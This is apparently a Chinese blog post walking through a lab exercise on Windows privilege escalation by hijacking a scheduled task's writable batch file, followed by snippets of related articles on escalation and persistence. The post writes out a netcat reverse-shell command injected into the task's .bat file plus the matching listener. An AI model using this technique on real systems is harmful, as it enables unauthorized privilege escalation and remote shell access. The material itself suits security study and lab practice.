windows-计划任务提权

最新推荐文章于 2024-03-24 23:49:39 发布
最新推荐文章于 2024-03-24 23:49:39 发布
阅读量715 收藏 5
点赞数 10
分类专栏: 靶场 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_73255659/article/details/136588784
版权

阅读须知:

探索者安全团队技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用本公众号所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者
本人负责,作者不为此承担任何责任,如有侵权烦请告知,我们会立即删除并致歉,创作不易转载请标明出处.感谢!

介绍

个人理解windows计划任务有很多,如果我们能够更改计划任务的.bat 文件 将他修改成我们需要的内容 就可以获取相应执行者权限,可以用来横向和纵向提权

查看计划任务

schtasks 是windwos 的查看计划任务的工具

schtasks /query  /tn  计划任务名字 /fo list /v

/fo list /v  是详细列出计划任务并且详细表示![alt text](https://img2.imgtp.com/2024/03/09/bIhyRBZt.png)

例如我们查看到 名字为vulntask文件名字的计划任务如下的计划任务

从中可以知道运行的脚本 以及 作者 和 运行的用户 是谁
可以看到是taskusr1 那么我们就或许可以横向到 这个用户

权限

首先看脚本文件的权限
icacls 文件
icacls C:\tasks\schtask.bat

可以看到我们有 F 读写执行完全的权限,只要有这个权限我们完全可以写入 反向连接shell
BUILTIN\Users:(I)(F):这表示内置用户组 “Users” 对该文件拥有读取和完全控制的权限。
NT AUTHORITY\SYSTEM:(I)(F):这表示系统用户拥有对该文件的读取和完全控制权限。
BUILTIN\Administrators:(I)(F):这表示内置管理员组拥有对该文件的读取和完全控制权限。
在这里,括号中的 (I) 代表 “继承”,(F) 代表 “完全控制”。

提权

在这个靶机上我们可以看到 已经存在nc

直接写入echo c:/tools/nc64.exe ip 端口 -e cmd.exe > C:\tasks\schtask.bat
然后开启监听 nc -nvlp 端口就可以横向提权到 taskusr1

[升] Linux & 维持 — 系统错误配置 - 计划任务
Blue17 の 小窝
02-07 1071
靶机 CentOS7:IP 192.168.0.137攻击机 Kali Linux:IP 192.168.0.136。
操作系统升(十)之系统错误配置-计划任务
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 667
计划任务的原理非常的简单,就是在设置计划任务的时候配置不当,导致我们可以更改计划任务执行的文件,我们可以进行劫持然后替换成自己的恶意文件达到的目的
使用计划任务到SYSTEM用户
11-17
WindowsXP SP2/SP3下及Windows7(SP1)下经测试可正常运行,源代码在压缩包中。
Windows 进程限浅谈 -- / 降
0x0007 的博客
03-24 4619
Windows 上,用户对限并不敏感,可能最为直观的是 UAC ,但相信很多人已经关掉了它的示。但其实安全性早已深入了 Windows 的方方面面。Windows Vista 引入了一个称为强制完整性控制()的新安全结构,类似于 Linux/Unix 中可用的完整性功能。在 Windows Vista 以及后续版本如Windows 11/10和Windows 8/7中,所有安全主体(用户、计算机、服务等)和对象(文件、注册表键、文件夹和资源)都被赋予MIC标签。
Windows 任务计划程序(task scheduler)介绍
热门推荐
glenshappy的专栏
01-05 3万+
如果是powershell ,则在路径输入 powershell 在添加参数:输入要执行的脚本路径,如:c:\aa.ps1 起始于:选择这个程序的执行的路径,一般会选择到该程序所在的目录,确保执行的时候,里面会调用到同目录文件,可以顺利调用。分一次,或者周期的每天,每周,每月。如cmd,则在路径输入 cmd 在添加参数:输入要执行的脚本路径,如c:\aa.bat 起始于:选择这个程序的执行的路径,一般会选择到该程序所在的目录,确保执行的时候,里面会调用到同目录文件,可以顺利调用。
Windows方法论
大河之犬的博客
10-13 322
但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。溢出攻击的基本原理是,通过向目标系统发送过长的输入数据,超出了程序所分配的缓冲区大小,导致溢出。如果我们对以高限运行的任务所在目录具有写入限,就可以使用恶意程序覆盖掉原来的程序,那么任务定时执行的时候会自动执行我们的脚本。假如存在漏洞路径,我们可以将木马放到上面的路径下,然后重启机器,此时,反弹回来的shell,则是一个system的shell。直接查看导出文档的任务名:上例为。
Windows系统简单总结
Aiwin的博客
07-13 1968
Windows系统简单总结
Windows---本地
qq_40012781的博客
07-02 553
使用本地,优势在于简单方便....
Windows--小迪--烂土豆--DLL劫持--udf
z2560088的博客
02-13 4500
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低限的用户,(jsp除外,拿到webshell就是system限)另一种是本地的环境,可能是服务器为管理某项服务创建的低限用户。不同环境下的操作会有所不同。 方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库 ...
windows系列上篇
hl1293348082的专栏
04-08 342
在渗透测试中,升自己的限是经常遇到的问题,往往在渗透中最容易获取的限就是一个webshell,如果网站是架设在Windows系统上的,这时就可能遇到这样的问题,还有一种情况是在做横向渗透的时候,收集到一些可以远程连接桌面的帐号,这是也需要,在实际的渗透中有很多的地方会需要这个操作,这个系列就主要介绍各种的方式。 基础 在之前首先要做的是对系统的操作系统信息做一些信息收集,关于信息收集的介绍请看之前的文章《Windows环境下的信息收集》,这里简单一下这几条命令: systemin
<RunLevel>HighestAvailable</RunLevel> python 添加计划任务最高限运行,避免弹出UAC对话框
zengliguang的专栏
03-12 431
账户运行的任务拥有系统级别的限,这是Windows中最高的限级别之一。这意味着该任务可以执行需要管理员限的操作。:由于是使用系统账户运行,因此在运行任务时不会弹出UAC示要求用户确认或输入密码。表示任务将在服务环境中以系统账户身份启动,而不是作为登录用户的一部分启动。身份运行,并且由于其高限性质,在执行时不需用户交互,类似于设置了。这段代码创建了一个计划任务,该任务将以。设置账户为管理员账户(如。
windows系统获取管理员限脚本
豪哥专栏
04-20 6289
下面脚本保存.bat即可 @echo off :: BatchGotAdmin :------------------------------------- REM --> Check for permissions >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\syst
windows
qq_38675102的博客
12-31 2506
windwos自学笔记-保持更新
windows通过命令给文件夹或文件增加
senge_com的博客
11-20 2832
给Demo001下的所有文件追加everyone限。给Demo001追加everyone限。
windows限维持之计划任务
weixin_51692662的博客
05-06 1136
windows限维持之计划任务
window bat之
G.Hypo的博客
06-08 1434
因为windows下好多命令是需要使用administrator来执行,具有管理员限的普通用户也不行,所以整理了一个方式 @echo off ::升为管理员 %1 %2 ver|find "5.">nul&&goto :Admin mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :Admin","","runas",1)(window.close)&goto :eof
Windows系列————上篇
Fly_鹏程万里
05-13 1万+
前言在渗透测试中,升自己的限是经常遇到的问题,往往在渗透中最容易获取的限就是一个webshell,如果网站是架设在Windows系统上的,这时就可能遇到这样的问题,还有一种情况是在做横向渗透的时候,收集到一些可以远程连接桌面的帐号,这是也需要,在实际的渗透中有很多的地方会需要这个操作,这个系列就主要介绍各种的方式。基础在之前首先要做的是对系统的操作系统信息做一些信息收集,关于信息...
计划任务给域用户
最新发布
05-14
### 如何为域用户以执行计划任务Windows Server 中,为了使域用户能够执行计划任务并具备相应的限,可以通过调整组策略对象 (GPO) 和配置安全选项来实现。以下是具体方法: #### 配置 GPO 设置 通过修改组策略中的安全选项,可以赋予特定的域用户或组执行计划任务所需的限。 1. **打开组策略编辑器** 使用 `gpedit.msc` 打开组策略编辑器[^3]。 2. **导航至目标路径** 定位到以下位置: ``` Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment ``` 3. **分配限** 修改以下两个关键的安全设置项: - **Log on as a batch job**: 将需要的域用户或组添加到这里,允许其作为批处理作业登录。 - 此设置确保域用户可以在后台运行计划任务[^3]。 - **Replace a process level token**: 添加域用户或组至此处,使其能够在更高限下运行进程。 - 这一步对于某些需要管理员限的任务至关重要[^3]。 4. **更新组策略** 在受影响的计算机上强制刷新组策略,使用命令: ```cmd gpupdate /force ``` #### 配置计划任务 完成上述操作后,在创建计划任务时需进一步确认限已生效。 1. **打开任务计划程序** 使用 `taskschd.msc` 启动任务计划程序。 2. **新建任务** 创建一个新的计划任务,并指定由具有适当限的域用户运行该任务。 3. **高级选项** 在任务属性窗口中,切换到“常规”标签页,勾选以下选项: - **使用最高特运行**:此选项可确保任务以管理员身份运行。 4. **验证触发条件和动作** 确认触发器和动作部分均按预期配置完毕。 #### 测试与验证 最后测试新配置的有效性。尝试以被授的域用户身份启动计划任务,观察是否成功以及是否有任何错误日志记录。 ```powershell Get-ScheduledTask | Where-Object {$_.State -eq 'Ready'} | ForEach-Object {Start-ScheduledTask $_.TaskName} ``` 以上 PowerShell 脚本可用于批量启动状态为 Ready 的所有计划任务---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值